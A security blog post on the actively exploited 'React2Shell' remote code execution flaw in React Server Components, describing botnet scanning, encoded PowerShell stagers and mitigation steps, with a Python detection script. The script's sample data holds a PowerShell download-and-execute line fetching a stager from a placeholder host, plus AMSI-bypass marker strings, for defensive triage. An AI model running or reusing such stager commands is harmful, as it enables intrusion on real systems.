It is another Monday, and unfortunately, we are starting the week with a critical development in the application security landscape. A new Remote Code Execution (RCE) vulnerability, which we are tracking as CVE-2025-55182 or “React2Shell,” has moved from theoretical risk to active exploitation in the wild. This isn’t just a minor patch warning; it involves a fundamental unsafe deserialization flaw within the React Server Components Flight protocol, effectively opening the door for unauthenticated attackers to execute arbitrary code on affected systems. If you are running React or downstream ecosystems like Next.js, this needs to be at the top of your triage list today.

The Industrialization of Exploitation
What strikes me most about the telemetry from researchers at GreyNoise is the speed and automation of these attacks. We aren’t seeing manual, tentative poking at firewalls here. Instead, the data reveals a highly automated, opportunistic campaign. Attackers are leveraging botnets—including evolutions of the notorious Mirai—to scan for this vulnerability at scale. The traffic patterns are distinctively non-organic; the fingerprints of the TCP stacks and HTTP clients scream “automation” rather than human browsing.
Deconstructing the Attack Chain
The exploitation chain observed in the field typically begins with unauthenticated probes against the Flight protocol surface, followed by small proof-of-execution commands. Successful probes are followed by encoded PowerShell stagers, which commonly use reflection and AMSI-evasion primitives. Network telemetry often shows requests from diverse ASNs and IPs concentrated in several regions, and the user-agent strings seen in telemetry include Go-http-client and various scanner signatures. On endpoints, defenders should prioritize detection of PowerShell process creation with encoded command arguments, unusual use of DownloadString/IEX, and script blocks containing AMSI-bypass markers.
Practical mitigation and response priorities
Organizations running React Server Components or frameworks that consume them must treat this vulnerability as high priority. The primary steps are straightforward: apply vendor patches or mitigations for the Flight protocol, restrict public exposure of server component endpoints where possible, and harden detection and containment controls. On the detection side, blocklists that target the campaign’s observed IPs and JA3/JA4 fingerprints can reduce noisy exploitation attempts, while endpoint telemetry should be tuned to flag the characteristic PowerShell validation and encoded-stager activity described above. Incident responders should also be prepared to triage signs of post-exploitation activity commonly associated with automated botnets and commodity toolkits.
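One way to implement the endpoint-side check described in the two sections above, as an added example that is not part of the original post: it pulls the -EncodedCommand argument out of constructed process-creation events, decodes it, and scores the result for the DownloadString/IEX, AMSI-marker and reflection traits mentioned, plus an assumed list of web-server parent images (node.exe and similar) that should rarely spawn PowerShell. The marker strings, threshold and sample command lines are my own constructions for illustration, not indicators published with the campaign.

```python
import base64
import binascii
import re

# Any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...) followed by a base64 blob.
ENC_FLAG = re.compile(r"(?:^|\s)-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]{8,})", re.I)
AMSI_MARKERS = ("amsiutils", "amsiinitfailed", "amsiscanbuffer", "amsicontext")
WEB_PARENTS = ("node.exe", "w3wp.exe", "httpd.exe", "nginx.exe")  # assumed: rarely spawn PowerShell legitimately

def decode_encoded_command(cmdline):
    """Return the script carried by -EncodedCommand (base64 over UTF-16LE), or None."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None  # malformed blob: nothing to inspect, though the flag itself is still odd

def analyze_event(parent_image, cmdline):
    """Score one process-creation event for the encoded-stager traits described above."""
    indicators, script = [], decode_encoded_command(cmdline)
    if script is not None:
        indicators.append("encoded_command")
        low = script.lower()
        if re.search(r"\biex\b|invoke-expression", low) and re.search(r"downloadstring|invoke-webrequest|\biwr\b", low):
            indicators.append("download_exec")
        if any(marker in low for marker in AMSI_MARKERS):
            indicators.append("amsi_bypass_marker")
        if re.search(r"\[ref\]\.assembly|\.gettype\(|\.getfield\(|\.setvalue\(", low):
            indicators.append("reflection")
    if parent_image.lower().rsplit("\\", 1)[-1] in WEB_PARENTS:
        indicators.append("web_server_parent")
    return {"indicators": indicators, "score": len(indicators), "script": script}

def triage(events, threshold=2):
    """Return (command line, analysis) pairs whose indicator count meets the threshold."""
    scored = ((cmd, analyze_event(parent, cmd)) for parent, cmd in events)
    return [(cmd, r) for cmd, r in scored if r["score"] >= threshold]

def _enc(script):  # encode exactly as PowerShell expects for -EncodedCommand
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

# Constructed sample events (not real telemetry): (parent image, command line) as an EDR logs them.
SAMPLE_EVENTS = [
    (r"C:\Program Files\nodejs\node.exe", "powershell.exe -nop -w hidden -enc "
     + _enc("IEX (New-Object Net.WebClient).DownloadString('http://stager.example.invalid/s')")),
    (r"C:\Windows\System32\svchost.exe", "powershell.exe -EncodedCommand " + _enc("Get-Service")),
    (r"C:\Windows\explorer.exe", r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"),
]
```

Running `triage(SAMPLE_EVENTS)` returns only the first event, flagged for the encoded argument, the download-and-execute pattern and the web-server parent; the benign encoded command scores too low to alert.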
Monitoring and threat intelligence recommendations
Continuous monitoring of server logs for unusual POSTs against server component endpoints, rapid repeat attempts with arithmetic-style commands, and spikes in small deterministic responses are useful early indicators. Enriching alerts with ASN and user-agent fingerprinting, and integrating threat feeds that capture the campaign’s IP infrastructure, will improve automated blocking and analyst triage. Because attackers have been observed integrating exploit code into botnet toolsets, defenders should assume opportunistic re-use across varying threat actors and prepare for follow-on lateral movement attempts if a host is compromised.
Final thoughts
I view React2Shell as a clear example of how modern web-framework features can expand an application’s attack surface when unsafe deserialization is present. The exploitation activity is opportunistic and automated, which means the risk grows quickly for internet-exposed services that lag on updates. Organizations should assume that simple, reproducible probes will appear in their logs and prioritize patching, exposure reduction, and detection rules that focus on the small, telltale PowerShell validations and encoded stagers seen in the wild. Treating this as an urgent operational task will materially reduce the likelihood of successful compromise.